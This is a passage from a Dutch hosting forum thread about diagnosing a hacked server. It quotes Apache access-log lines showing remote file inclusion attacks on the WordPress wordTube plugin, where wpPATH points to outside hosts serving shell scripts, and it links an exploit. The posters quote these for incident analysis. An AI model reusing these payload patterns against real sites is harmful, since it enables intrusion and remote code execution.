ja dank je, had ik dus in je andere topic gepost
typfoutje, even regel voor regel proberen uit te voeren om zo op te zoeken op welke hij stuk gaat.als ik de iptables aanpas dan staat er
iptables v1.3.0: invalid port/service `' specified
Try `iptables -h' or 'iptables --help' for more information.
wow, dit is die nieuwe WP sploit die ze misbruikt hebben[root@centralnexus tmp]# grep 'perl' /var/www/vhosts/*/statistics/logs/access_log
/var/www/vhosts/purestas.com/statistics/logs/access_log:203.157.172.2 - - [08/May/2007:04:45:08 +0200] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://shellbr.xpg.com.br/cmd.txt? HTTP/1.1" 200 11584 "-" "libwww-perl/5.79"
/var/www/vhosts/purestas.com/statistics/logs/access_log:80.6.95.5 - - [08/May/2007:06:07:24 +0200] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.pnp21.co.kr/bbs/data/.xpl/cmd.gif? HTTP/1.1" 200 11584 "-" "libwww-perl/5.805"
/var/www/vhosts/purestas.com/statistics/logs/access_log:81.7.87.251 - - [08/May/2007:09:18:00 +0200] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.prancuzai-mopsai.lt/eval.txt? HTTP/1.1" 200 514 "-" "libwww-perl/5.65"
/var/www/vhosts/purestas.com/statistics/logs/access_log:84.16.242.71 - - [08/May/2007:10:46:41 +0200] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.pronext.eu/help/a.txt? HTTP/1.1" 200 496 "-" "libwww-perl/5.805"
/var/www/vhosts/purestas.com/statistics/logs/access_log:201.41.100.226 - - [08/May/2007:11:19:47 +0200] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://perdu.ch/cgi-bin/echo? HTTP/1.1" 200 498 "-" "libwww-perl/5.65"
/var/www/vhosts/purestas.com/statistics/logs/access_log:216.104.33.30 - - [08/May/2007:11:45:20 +0200] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.pnp21.co.kr/bbs/data/.xpl/os? HTTP/1.1" 200 319 "-" "libwww-perl/5.805"
/var/www/vhosts/purestas.com/statistics/logs/access_log:85.10.128.239 - - [08/May/2007:12:18:48 +0200] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://sanwall.info/echo.txt? HTTP/1.1" 200 500 "-" "libwww-perl/5.803"
[root@centralnexus tmp]#lijp
http://www.milw0rm.com/exploits/3825
kortom, iemand op je server heeft een lekke wordpress, en doordat de tmp mappen +x hebben/hadden kon er malicious code uitgevoerd worden.

Likes:




lijp
Quote
volgens mij heb je ook niet zoveel aan de extra ip's, of je mag de ip's gaan omnummeren (hoeft niet veel werk te zijn, alhoewel, moet wel 's nachts gebeuren). Maar dat zal waarschijnlijk geen eens invloed hebben. Het gaat hier niet om een DDOS op een IP oid. De wordpress-exploit gaat zelfs via de hostname, deze zal dan mooi direct naar het nieuwe ip resolven.